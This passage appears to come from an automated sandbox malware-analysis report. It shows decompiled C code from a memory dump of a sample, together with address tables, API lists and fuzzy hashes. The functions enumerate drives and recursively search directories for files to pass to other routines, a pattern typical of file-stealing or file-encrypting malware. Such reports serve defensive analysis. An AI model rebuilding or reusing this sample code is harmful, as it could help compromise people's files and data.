                                                                                                                                                                        						}
                                                                                                                                                                        						_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        						PathCombineW(_t83, _t80,  &(_v608.cFileName));
                                                                                                                                                                        						_push(1);
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_t14 =  &_a8; // 0x407b38
                                                                                                                                                                        						_push( *_t14);
                                                                                                                                                                        						_push(_a4);
                                                                                                                                                                        						E00401E18(_t83, _v12); // executed
                                                                                                                                                                        						_t84 = _t84 + 0xc;
                                                                                                                                                                        						if(_t83 != 0) {
                                                                                                                                                                        							LocalFree(_t83);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					PathCombineW(_t83, _t80,  &(_v608.cFileName));
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					goto L8;
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_t33 = FindNextFileW(_t60,  &_v608); // executed
                                                                                                                                                                        				} while (_t33 != 0);
                                                                                                                                                                        				FindClose(_t60); // executed
                                                                                                                                                                        				goto L14;
                                                                                                                                                                        			}


















                                                                                                                                                                        0x00401b15
                                                                                                                                                                        0x00401b18
                                                                                                                                                                        0x00401b1a
                                                                                                                                                                        0x00401c80
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401c80
                                                                                                                                                                        0x00401b20
                                                                                                                                                                        0x00401b30
                                                                                                                                                                        0x00401b43
                                                                                                                                                                        0x00401b5b
                                                                                                                                                                        0x00401b5d
                                                                                                                                                                        0x00401b62
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b64
                                                                                                                                                                        0x00401b6b
                                                                                                                                                                        0x00401b6b
                                                                                                                                                                        0x00401b72
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b78
                                                                                                                                                                        0x00401b89
                                                                                                                                                                        0x00401b8e
                                                                                                                                                                        0x00401bb3
                                                                                                                                                                        0x00401bca
                                                                                                                                                                        0x00401bd2
                                                                                                                                                                        0x00401c17
                                                                                                                                                                        0x00401c1f
                                                                                                                                                                        0x00401c27
                                                                                                                                                                        0x00401c34
                                                                                                                                                                        0x00401c37
                                                                                                                                                                        0x00401c40
                                                                                                                                                                        0x00401c53
                                                                                                                                                                        0x00401c59
                                                                                                                                                                        0x00401c5e
                                                                                                                                                                        0x00401c5e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401c1f
                                                                                                                                                                        0x00401be2
                                                                                                                                                                        0x00401bed
                                                                                                                                                                        0x00401bf3
                                                                                                                                                                        0x00401bf5
                                                                                                                                                                        0x00401bf5
                                                                                                                                                                        0x00401bf5
                                                                                                                                                                        0x00401bfd
                                                                                                                                                                        0x00401c00
                                                                                                                                                                        0x00401c05
                                                                                                                                                                        0x00401c0a
                                                                                                                                                                        0x00401c0d
                                                                                                                                                                        0x00401c0d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401c0a
                                                                                                                                                                        0x00401b9e
                                                                                                                                                                        0x00401ba9
                                                                                                                                                                        0x00401baf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401c61
                                                                                                                                                                        0x00401c6f
                                                                                                                                                                        0x00401c71
                                                                                                                                                                        0x00401c7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401C0D
                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401C6F
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00401C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseCombineFirstFreeLocalNextPath
                                                                                                                                                                        • String ID: 8\m$8{@$`n
                                                                                                                                                                        • API String ID: 3818457336-673302825
                                                                                                                                                                        • Opcode ID: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
                                                                                                                                                                        • Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
                                                                                                                                                                        • Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                                        			E0040ABD8(intOrPtr __ecx, short __edx) {
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				short _v24;
                                                                                                                                                                        				short _v28;
                                                                                                                                                                        				short _v30;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr* _v44;
                                                                                                                                                                        				WCHAR* _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				long _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                        				char _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				void* _v108;
                                                                                                                                                                        				void* _v112;
                                                                                                                                                                        				short* _v136;
                                                                                                                                                                        				WCHAR* _v140;
                                                                                                                                                                        				char _v152;
                                                                                                                                                                        				intOrPtr _v156;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				long _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				void* _t51;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				char _t55;
                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				WCHAR* _t94;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				long _t102;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				WCHAR* _t107;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				short* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v24 = __edx;
                                                                                                                                                                        				_v20 = __ecx;
                                                                                                                                                                        				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
                                                                                                                                                                        				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0); // executed
                                                                                                                                                                        				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
                                                                                                                                                                        				if(_t44 >= 0) {
                                                                                                                                                                        					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        					_v48 = _t107;
                                                                                                                                                                        					_t47 = GetLogicalDriveStringsW(0x208, _t107); // executed
                                                                                                                                                                        					_v56 = _t47;
                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						if(_v60 > 0) {
                                                                                                                                                                        							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t98 = 0x10;
                                                                                                                                                                        							_t53 = E0040A05F(_t51, _t98);
                                                                                                                                                                        							_v52 = _t53;
                                                                                                                                                                        							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
                                                                                                                                                                        							_t110 = _v60;
                                                                                                                                                                        							_t55 = E0040A503(_t54, _t110);
                                                                                                                                                                        							_t87 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        							_v72 = _t55;
                                                                                                                                                                        							_v80 = _t87;
                                                                                                                                                                        							_v76 = 0;
                                                                                                                                                                        							_t57 = E00408619( &_v72);
                                                                                                                                                                        							_v68 = _t57;
                                                                                                                                                                        							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
                                                                                                                                                                        								if(0 != 0) {
                                                                                                                                                                        									E00407EDB(_v136, _t118, 0, 0, _v156, _t78, _v140,  &_v152);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t118);
                                                                                                                                                                        							LocalFree(_v108);
                                                                                                                                                                        							LocalFree(_v112);
                                                                                                                                                                        							LocalFree(_t110);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t115 = 1;
                                                                                                                                                                        						L16:
                                                                                                                                                                        						LocalFree(_t78);
                                                                                                                                                                        						_t49 = _t115;
                                                                                                                                                                        						L17:
                                                                                                                                                                        						return _t49;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t119 = 0;
                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t94 = _v48;
                                                                                                                                                                        					_t111 =  &(_t107[0xfffffffffffffffe]);
                                                                                                                                                                        					_t102 = _v56;
                                                                                                                                                                        					_t69 = _t94 - 6;
                                                                                                                                                                        					_v44 = _t69;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if(_t119 <= 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t102 = _v56;
                                                                                                                                                                        						if(_t94[_t119] != 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v32 =  *_t69;
                                                                                                                                                                        						_v30 =  *_t111;
                                                                                                                                                                        						_v28 = 0;
                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                        						_t74 = E0040AE06( &_v32, _t78,  &_v60, _v36,  &_v32, _t73, _v40, 0); // executed
                                                                                                                                                                        						_t123 = _t123 + 0x14;
                                                                                                                                                                        						if(_t74 < 0) {
                                                                                                                                                                        							_t115 = _t119 | 0xffffffff;
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t119 = _t119 + 1;
                                                                                                                                                                        						_t94 = _v48;
                                                                                                                                                                        						_t69 = _v44 + 2;
                                                                                                                                                                        						_t102 = _v56;
                                                                                                                                                                        						_t111 =  &(_t111[1]);
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t119 = _t119 + 3;
                                                                                                                                                                        						_t69 = _t69 + 6;
                                                                                                                                                                        						_t111 =  &(_t111[3]);
                                                                                                                                                                        						_v44 = _t69;
                                                                                                                                                                        					} while (_t119 < _t102);
                                                                                                                                                                        					goto L10;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t49 = LocalFree(_t78) | 0xffffffff;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}




















































                                                                                                                                                                        0x0040abef
                                                                                                                                                                        0x0040abfa
                                                                                                                                                                        0x0040abfe
                                                                                                                                                                        0x0040ac04
                                                                                                                                                                        0x0040ac13
                                                                                                                                                                        0x0040ac18
                                                                                                                                                                        0x0040ac1d
                                                                                                                                                                        0x0040ac42
                                                                                                                                                                        0x0040ac4a
                                                                                                                                                                        0x0040ac4e
                                                                                                                                                                        0x0040ac50
                                                                                                                                                                        0x0040ac56
                                                                                                                                                                        0x0040acee
                                                                                                                                                                        0x0040acf3
                                                                                                                                                                        0x0040ad05
                                                                                                                                                                        0x0040ad16
                                                                                                                                                                        0x0040ad1a
                                                                                                                                                                        0x0040ad1f
                                                                                                                                                                        0x0040ad31
                                                                                                                                                                        0x0040ad35
                                                                                                                                                                        0x0040ad37
                                                                                                                                                                        0x0040ad3f
                                                                                                                                                                        0x0040ad44
                                                                                                                                                                        0x0040ad4a
                                                                                                                                                                        0x0040ad50
                                                                                                                                                                        0x0040ad58
                                                                                                                                                                        0x0040ad5c
                                                                                                                                                                        0x0040ad6e
                                                                                                                                                                        0x0040ad7a
                                                                                                                                                                        0x0040ad8b
                                                                                                                                                                        0x0040ad8f
                                                                                                                                                                        0x0040ada6
                                                                                                                                                                        0x0040adaa
                                                                                                                                                                        0x0040adc4
                                                                                                                                                                        0x0040adc9
                                                                                                                                                                        0x0040adaa
                                                                                                                                                                        0x0040adcd
                                                                                                                                                                        0x0040add7
                                                                                                                                                                        0x0040ade1
                                                                                                                                                                        0x0040ade8
                                                                                                                                                                        0x0040ade8
                                                                                                                                                                        0x0040adf0
                                                                                                                                                                        0x0040adf1
                                                                                                                                                                        0x0040adf2
                                                                                                                                                                        0x0040adf8
                                                                                                                                                                        0x0040adfa
                                                                                                                                                                        0x0040ae00
                                                                                                                                                                        0x0040ae00
                                                                                                                                                                        0x0040ac5e
                                                                                                                                                                        0x0040ac62
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac68
                                                                                                                                                                        0x0040ac6c
                                                                                                                                                                        0x0040ac6f
                                                                                                                                                                        0x0040ac73
                                                                                                                                                                        0x0040ac76
                                                                                                                                                                        0x0040ac7a
                                                                                                                                                                        0x0040ac7c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac84
                                                                                                                                                                        0x0040ac88
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac91
                                                                                                                                                                        0x0040ac9b
                                                                                                                                                                        0x0040aca7
                                                                                                                                                                        0x0040acab
                                                                                                                                                                        0x0040acba
                                                                                                                                                                        0x0040acbf
                                                                                                                                                                        0x0040acc4
                                                                                                                                                                        0x0040ae01
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ae01
                                                                                                                                                                        0x0040acce
                                                                                                                                                                        0x0040accf
                                                                                                                                                                        0x0040acd3
                                                                                                                                                                        0x0040acd6
                                                                                                                                                                        0x0040acda
                                                                                                                                                                        0x0040acdd
                                                                                                                                                                        0x0040acdd
                                                                                                                                                                        0x0040ace0
                                                                                                                                                                        0x0040ace3
                                                                                                                                                                        0x0040ace6
                                                                                                                                                                        0x0040acea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac7a
                                                                                                                                                                        0x0040ac26
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AC20
                                                                                                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000208,00000000), ref: 0040AC4E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveFreeLocalLogicalStrings
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 1768043713-3488577920
                                                                                                                                                                        • Opcode ID: 99c62c4b5ef8cfe9a5f11bf27ef9e755505db6d71708b7bfda759fd71d10aa15
                                                                                                                                                                        • Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
                                                                                                                                                                        • Opcode Fuzzy Hash: 99c62c4b5ef8cfe9a5f11bf27ef9e755505db6d71708b7bfda759fd71d10aa15
                                                                                                                                                                        • Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 17%
                                                                                                                                                                        			E0040196E(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                        				char _v1126;
                                                                                                                                                                        				short _v1128;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				int _t34;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				WCHAR* _t83;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				WCHAR* _t85;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        
                                                                                                                                                                        				_t84 = __edx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t83 = __ecx;
                                                                                                                                                                        				if(_a12 > 2) {
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				E004018E9( &_v1128, 0x104, __ecx, __ecx);
                                                                                                                                                                        				E0040188C(0x104,  &_v1128, 0x104, __edx,  *0x40e1d0);
                                                                                                                                                                        				_t33 = FindFirstFileW( &_v1128,  &_v608); // executed
                                                                                                                                                                        				_t62 = _t33;
                                                                                                                                                                        				if(_t62 != 0xffffffff) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push( *0x40e1dc);
                                                                                                                                                                        						_push( &(_v608.cFileName));
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e0a0))() != 0) {
                                                                                                                                                                        							_push( *0x40e1ac);
                                                                                                                                                                        							_push( &(_v608.cFileName));
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e18c))() == 0) {
                                                                                                                                                                        								L16:
                                                                                                                                                                        								_t39 = 0x2e;
                                                                                                                                                                        								if(_t39 != _v608.cFileName) {
                                                                                                                                                                        									_t41 =  *((intOrPtr*)( *0x40e08c))(_t83);
                                                                                                                                                                        									_t72 =  &_v1126 + _t41 * 2;
                                                                                                                                                                        									_push( &_v1126 + _t41 * 2);
                                                                                                                                                                        									E004018E9( &_v1126 + _t41 * 2, 0x104, _t72,  &(_v608.cFileName));
                                                                                                                                                                        									E0040196E( &_v1128, _t84, _a4, _a8, _a12 + 1); // executed
                                                                                                                                                                        									_t86 = _t86 + 0xc;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L9;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push( *0x40e1cc);
                                                                                                                                                                        							_push( &(_v608.cFileName));
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e18c))() == 0) {
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							PathCombineW(_t85, _t83,  &(_v608.cFileName));
                                                                                                                                                                        							_push(1);
                                                                                                                                                                        							L6:
                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                        							_push(_a4);
                                                                                                                                                                        							E00401E18(_t85, _v12);
                                                                                                                                                                        							_t86 = _t86 + 0xc;
                                                                                                                                                                        							if(_t85 != 0) {
                                                                                                                                                                        								LocalFree(_t85);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t84 = _v12;
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        						PathCombineW(_t85, _t83,  &(_v608.cFileName));
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t34 = FindNextFileW(_t62,  &_v608); // executed
                                                                                                                                                                        					} while (_t34 != 0);
                                                                                                                                                                        					FindClose(_t62); // executed
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}


















                                                                                                                                                                        0x0040197d
                                                                                                                                                                        0x00401980
                                                                                                                                                                        0x00401983
                                                                                                                                                                        0x00401985
                                                                                                                                                                        0x00401a54
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a54
                                                                                                                                                                        0x0040198b
                                                                                                                                                                        0x0040199b
                                                                                                                                                                        0x004019ae
                                                                                                                                                                        0x004019c6
                                                                                                                                                                        0x004019c8
                                                                                                                                                                        0x004019cd
                                                                                                                                                                        0x004019d6
                                                                                                                                                                        0x004019dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004019df
                                                                                                                                                                        0x004019f0
                                                                                                                                                                        0x004019f5
                                                                                                                                                                        0x00401a5b
                                                                                                                                                                        0x00401a6c
                                                                                                                                                                        0x00401a71
                                                                                                                                                                        0x00401ab1
                                                                                                                                                                        0x00401ab3
                                                                                                                                                                        0x00401abb
                                                                                                                                                                        0x00401ac7
                                                                                                                                                                        0x00401ad4
                                                                                                                                                                        0x00401ad7
                                                                                                                                                                        0x00401ae0
                                                                                                                                                                        0x00401af8
                                                                                                                                                                        0x00401afd
                                                                                                                                                                        0x00401afd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401abb
                                                                                                                                                                        0x00401a73
                                                                                                                                                                        0x00401a84
                                                                                                                                                                        0x00401a89
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a99
                                                                                                                                                                        0x00401aa4
                                                                                                                                                                        0x00401aaa
                                                                                                                                                                        0x00401a18
                                                                                                                                                                        0x00401a18
                                                                                                                                                                        0x00401a20
                                                                                                                                                                        0x00401a23
                                                                                                                                                                        0x00401a28
                                                                                                                                                                        0x00401a2d
                                                                                                                                                                        0x00401a30
                                                                                                                                                                        0x00401a30
                                                                                                                                                                        0x00401a36
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a36
                                                                                                                                                                        0x00401a05
                                                                                                                                                                        0x00401a10
                                                                                                                                                                        0x00401a16
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a39
                                                                                                                                                                        0x00401a47
                                                                                                                                                                        0x00401a49
                                                                                                                                                                        0x00401a4e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a4e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401A30
                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401A47
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00401A4E
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CombineFilePath$CloseFirstFreeLocalNext
                                                                                                                                                                        • String ID: 8\m$`n
                                                                                                                                                                        • API String ID: 1203334675-628685132
                                                                                                                                                                        • Opcode ID: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
                                                                                                                                                                        • Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
                                                                                                                                                                        • Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                        			E0040633E(WCHAR* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				char _v524;
                                                                                                                                                                        				char _v536;
                                                                                                                                                                        				char _v538;
                                                                                                                                                                        				short _v540;
                                                                                                                                                                        				char _v552;
                                                                                                                                                                        				char _v1076;
                                                                                                                                                                        				intOrPtr _v1084;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v1132;
                                                                                                                                                                        				short* _v1148;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				int _t31;
                                                                                                                                                                        				void* _t34;
                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        
                                                                                                                                                                        				_t76 = _a8;
                                                                                                                                                                        				_t49 = __ecx;
                                                                                                                                                                        				_v1132.ftLastAccessTime.dwFileAttributes = __edx;
                                                                                                                                                                        				if(_t76 > 2) {
                                                                                                                                                                        					L10:
                                                                                                                                                                        					_t25 = 1;
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _t25;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				E004018E9( &_v524, 0x104, __ecx, __ecx);
                                                                                                                                                                        				E0040188C(__ecx,  &_v536, 0x104, _t76,  *0x40e1d0);
                                                                                                                                                                        				_t29 = FindFirstFileW( &_v540,  &_v1132); // executed
                                                                                                                                                                        				_t74 = _t29;
                                                                                                                                                                        				if(_t74 != 0xffffffff) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						__eflags = _v1132.ftLastAccessTime.dwFileAttributes & 0x00000010;
                                                                                                                                                                        						if((_v1132.ftLastAccessTime.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)( *0x40e0a0))( &_v1076,  *0x40e394);
                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                        								_t34 = 0x2e;
                                                                                                                                                                        								__eflags = _t34 - _v1084;
                                                                                                                                                                        								if(_t34 != _v1084) {
                                                                                                                                                                        									_t36 =  *((intOrPtr*)( *0x40e08c))(_t49);
                                                                                                                                                                        									_t59 =  &_v538 + _t36 * 2;
                                                                                                                                                                        									_push( &_v538 + _t36 * 2);
                                                                                                                                                                        									E004018E9( &_v538 + _t36 * 2, 0x104, _t59,  &(_v1132.cFileName));
                                                                                                                                                                        									_t22 = _t76 + 1; // 0x407b87
                                                                                                                                                                        									E0040633E( &_v552, _v1148, _a4, _t22); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								PathCombineW(_t78, _t49,  &(_v1132.dwReserved1));
                                                                                                                                                                        								E00406725(_t78, _v1148, __eflags, _a4);
                                                                                                                                                                        								__eflags = _t78;
                                                                                                                                                                        								if(_t78 != 0) {
                                                                                                                                                                        									LocalFree(_t78);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t76 = _a8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t31 = FindNextFileW(_t74,  &(_v1132.ftLastAccessTime)); // executed
                                                                                                                                                                        						__eflags = _t31;
                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                        					FindClose(_t74);
                                                                                                                                                                        					goto L10;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t25 = 0;
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        			}























                                                                                                                                                                        0x0040634c
                                                                                                                                                                        0x0040634f
                                                                                                                                                                        0x00406351
                                                                                                                                                                        0x00406359
                                                                                                                                                                        0x00406417
                                                                                                                                                                        0x00406417
                                                                                                                                                                        0x00406419
                                                                                                                                                                        0x0040641f
                                                                                                                                                                        0x0040641f
